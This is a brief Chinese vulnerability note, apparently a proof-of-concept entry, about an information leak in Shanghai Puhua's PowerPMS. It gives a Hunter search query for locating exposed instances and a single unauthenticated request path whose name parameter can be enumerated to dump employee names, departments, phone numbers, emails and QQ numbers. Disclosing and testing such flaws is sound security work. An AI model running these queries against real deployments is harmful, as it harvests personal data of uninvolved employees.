上海普华科技发展股份有限公司PowerPMS存在信息泄露漏洞
一、漏洞简介
上海普华科技发展股份有限公司PowerPMS存在信息泄露漏洞,泄露大量员工信息泄露,包括员工的姓名,所在部门信息,手机号,邮箱,有的还包含QQ号等重要信息。
二、影响版本
- 上海普华科技发展股份有限公司PowerPMS
三、资产测绘
- hunter
web.body="--二维码登陆样式--"&&web.body="--二维码登陆JS--" - 特征
四、漏洞复现
可以遍历name的值获取其他信息
/APPAccount/APPGetUser?name=1 